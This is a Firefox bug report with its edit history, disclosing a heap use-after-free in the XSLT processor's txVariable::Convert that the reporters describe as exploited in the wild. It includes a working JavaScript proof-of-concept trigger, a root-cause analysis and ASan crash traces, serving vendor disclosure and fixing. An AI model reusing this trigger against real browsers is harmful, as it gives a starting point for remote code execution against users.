Bug 1758062 Comment 0 Edit History

Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.

Original comment by
on 
#Summary
heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert[exploited in th wild]

#Type
Render RCE

#NOTE
We have evidence that the following bug is being explot in the wild.

#CREDIT
wang gang&liu jialei&du sihang&huang yi&yang kang of 360 ATA


#MINIPOC
```
<script>			
var v1 = '<?xml version="1.0" encoding="utf-8" ?><root><e></e></root>';
var v2 = '<?xml version="1.0" encoding="utf-8"?>  <xsl:stylesheet version="1.0"   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  xmlns:msxsl="urn:schemas-microsoft-com:xslt"   xmlns:exsl="http://exslt.org/common"  exclude-result-prefixes="msxsl">    <xsl:output method="xml" indent="yes"/> <xsl:param name="test00" />  <xsl:template match="/"> <xsl:value-of select="$test00" />  </xsl:template>    </xsl:stylesheet>';

var a1 = new DOMParser();
var a2 = new XSLTProcessor();
var a3 = a1.parseFromString(v2, "text/xml");
var a4 = a1.parseFromString(v1, "text/xml")
cb01 = {
	[Symbol.toPrimitive](hint) {
		console.log('cb01.toPrimitive')
		a2.removeParameter(null, 'test00');
		if (hint == 'string')
			return 'xxxxx';
		return true;
	}
};
a2.importStylesheet(a3);
a2.setParameter(null, 'test00', cb01);
console.log('bef transformToDocument')
a2.transformToDocument(a4);	
</script>				
```

#RCA
1. Convert get call by transformToDocument
2. Convert use JS::ToString to get str value which cause user js get call
3. in callback attack call removeParameter to free txVariable itself cause uaf
```
nsresult txVariable::Convert(nsIVariant* aValue, txAExprResult** aResult) {

	JS::Rooted<JS::Value> v(cx, JS::ObjectValue(*jsobj));
	JS::Rooted<JSString*> str(cx, JS::ToString(cx, v));		<<[1]
	NS_ENSURE_TRUE(str, NS_ERROR_FAILURE);

	nsAutoJSString value;
	NS_ENSURE_TRUE(value.init(cx, str), NS_ERROR_FAILURE);

	*aResult = new StringResult(value, nullptr);
	NS_ADDREF(*aResult);
```

#ASAN
=================================================================
==15704==ERROR: AddressSanitizer: heap-use-after-free on address 0x12233621cfa0 at pc 0x7ffe52dd81c0 bp 0x00cfa93f7820 sp 0x00cfa93f7868
WRITE of size 8 at 0x12233621cfa0 thread T0
    #0 0x7ffe52dd81bf in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361
    #1 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #2 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #3 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #4 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #5 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #6 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #7 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #8 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #9 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #10 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #11 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #12 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #13 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #14 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #15 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #16 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #17 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #18 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #19 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #20 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #21 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #22 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #23 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #24 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #25 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #26 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #27 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #28 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #29 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #30 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #31 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390
    #32 0x7ffe4a006921 in mozilla::detail::RunnableFunction<`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:124:7'>::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:531
    #33 0x7ffe49fde593 in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1173
    #34 0x7ffe49fef6ac in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
    #35 0x7ffe4b48986d in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #36 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #37 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #38 0x7ffe5354606a in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137
    #39 0x7ffe5372c29b in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:605
    #40 0x7ffe57dc68f4 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:878
    #41 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #42 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #43 0x7ffe57dc5e15 in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:715
    #44 0x7ff685b9208c in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #45 0x7ff685b917ad in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:147
    #46 0x7ff685c8e757 in __scrt_common_main_seh d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #47 0x7ffef2fe7033 in BaseThreadInitThunk+0x13 (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #48 0x7ffef3ce2650 in RtlUserThreadStart+0x20 (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)

0x12233621cfa0 is located 16 bytes inside of 24-byte region [0x12233621cf90,0x12233621cfa8)
freed by thread T0 here:
    #0 0x7ffebc467cdb in free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:82
    #1 0x7ffe52ddd54b in txVariable::~txVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:199
    #2 0x7ffe52dd4309 in txMozillaXSLTProcessor::RemoveParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:964
    #3 0x7ffe4f61aaa9 in mozilla::dom::XSLTProcessor_Binding::removeParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:367
    #4 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #5 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #6 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #7 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #8 0x7ffe580b4b13 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:544
    #9 0x7ffe580b772e in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:589
    #10 0x7ffe5841488f in js::ToPrimitiveSlow /builds/worker/checkouts/gecko/js/src/vm/JSObject.cpp:2402
    #11 0x7ffe58778172 in js::ToStringSlow<js::CanGC> /builds/worker/checkouts/gecko/js/src/vm/StringType.cpp:2185
    #12 0x7ffe52dd7593 in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1355
    #13 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #14 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #15 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #16 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #17 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #18 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #19 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #20 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #21 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #22 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #23 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #24 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #25 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #26 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #27 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515

previously allocated by thread T0 here:
    #0 0x7ffebc467deb in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:98
    #1 0x7ffec314134d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ffe52dd21d0 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:920
    #3 0x7ffe52dd5ce7 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1210
    #4 0x7ffe4f61948b in mozilla::dom::XSLTProcessor_Binding::setParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:263
    #5 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #6 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #7 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #8 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #9 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #10 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #11 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #12 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #13 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #14 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #15 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #16 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #17 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #18 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #19 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #20 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #21 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #22 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #23 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #24 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #25 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #26 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #27 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert
Shadow bytes around the buggy address:
  0x04619cdc39a0: fd fd fa fa fd fd fd fd fa fa 00 00 00 00 fa fa
  0x04619cdc39b0: 00 00 00 00 fa fa fd fd fd fd fa fa 00 00 00 fa
  0x04619cdc39c0: fa fa 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00
  0x04619cdc39d0: 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd fa fa
  0x04619cdc39e0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 fa
=>0x04619cdc39f0: fa fa fd fd[fd]fa fa fa fd fd fd fd fa fa 00 00
  0x04619cdc3a00: 00 00 fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
  0x04619cdc3a10: 00 00 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd
  0x04619cdc3a20: fa fa 00 00 00 00 fa fa 00 00 00 fa fa fa 00 00
  0x04619cdc3a30: 00 00 fa fa fd fd fd fa fa fa fd fd fd fd fa fa
  0x04619cdc3a40: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15704==ABORTING
Revision 1 by
on 
#Summary
heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert[exploited in th wild]

#Type
Render RCE

#NOTE
We have evidence that the following bug is being explot in the wild.

#CREDIT
wang gang&liu jialei&du sihang&huang yi&yang kang of 360 ATA


#MINIPOC
```HTML
<script>			
var v1 = '<?xml version="1.0" encoding="utf-8" ?><root><e></e></root>';
var v2 = '<?xml version="1.0" encoding="utf-8"?>  <xsl:stylesheet version="1.0"   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  xmlns:msxsl="urn:schemas-microsoft-com:xslt"   xmlns:exsl="http://exslt.org/common"  exclude-result-prefixes="msxsl">    <xsl:output method="xml" indent="yes"/> <xsl:param name="test00" />  <xsl:template match="/"> <xsl:value-of select="$test00" />  </xsl:template>    </xsl:stylesheet>';

var a1 = new DOMParser();
var a2 = new XSLTProcessor();
var a3 = a1.parseFromString(v2, "text/xml");
var a4 = a1.parseFromString(v1, "text/xml")
cb01 = {
	[Symbol.toPrimitive](hint) {
		console.log('cb01.toPrimitive')
		a2.removeParameter(null, 'test00');
		if (hint == 'string')
			return 'xxxxx';
		return true;
	}
};
a2.importStylesheet(a3);
a2.setParameter(null, 'test00', cb01);
console.log('bef transformToDocument')
a2.transformToDocument(a4);	
</script>				
```

#RCA
1. Convert get call by transformToDocument
2. Convert use JS::ToString to get str value which cause user js get call
3. in callback attack call removeParameter to free txVariable itself cause uaf
```C++
nsresult txVariable::Convert(nsIVariant* aValue, txAExprResult** aResult) {

	JS::Rooted<JS::Value> v(cx, JS::ObjectValue(*jsobj));
	JS::Rooted<JSString*> str(cx, JS::ToString(cx, v));		<<[1]
	NS_ENSURE_TRUE(str, NS_ERROR_FAILURE);

	nsAutoJSString value;
	NS_ENSURE_TRUE(value.init(cx, str), NS_ERROR_FAILURE);

	*aResult = new StringResult(value, nullptr);
	NS_ADDREF(*aResult);
```
```
#ASAN
=================================================================
==15704==ERROR: AddressSanitizer: heap-use-after-free on address 0x12233621cfa0 at pc 0x7ffe52dd81c0 bp 0x00cfa93f7820 sp 0x00cfa93f7868
WRITE of size 8 at 0x12233621cfa0 thread T0
    #0 0x7ffe52dd81bf in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361
    #1 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #2 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #3 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #4 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #5 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #6 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #7 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #8 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #9 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #10 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #11 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #12 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #13 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #14 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #15 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #16 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #17 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #18 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #19 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #20 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #21 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #22 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #23 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #24 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #25 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #26 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #27 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #28 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #29 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #30 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #31 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390
    #32 0x7ffe4a006921 in mozilla::detail::RunnableFunction<`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:124:7'>::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:531
    #33 0x7ffe49fde593 in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1173
    #34 0x7ffe49fef6ac in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
    #35 0x7ffe4b48986d in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #36 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #37 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #38 0x7ffe5354606a in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137
    #39 0x7ffe5372c29b in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:605
    #40 0x7ffe57dc68f4 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:878
    #41 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #42 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #43 0x7ffe57dc5e15 in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:715
    #44 0x7ff685b9208c in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #45 0x7ff685b917ad in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:147
    #46 0x7ff685c8e757 in __scrt_common_main_seh d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #47 0x7ffef2fe7033 in BaseThreadInitThunk+0x13 (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #48 0x7ffef3ce2650 in RtlUserThreadStart+0x20 (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)

0x12233621cfa0 is located 16 bytes inside of 24-byte region [0x12233621cf90,0x12233621cfa8)
freed by thread T0 here:
    #0 0x7ffebc467cdb in free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:82
    #1 0x7ffe52ddd54b in txVariable::~txVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:199
    #2 0x7ffe52dd4309 in txMozillaXSLTProcessor::RemoveParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:964
    #3 0x7ffe4f61aaa9 in mozilla::dom::XSLTProcessor_Binding::removeParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:367
    #4 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #5 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #6 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
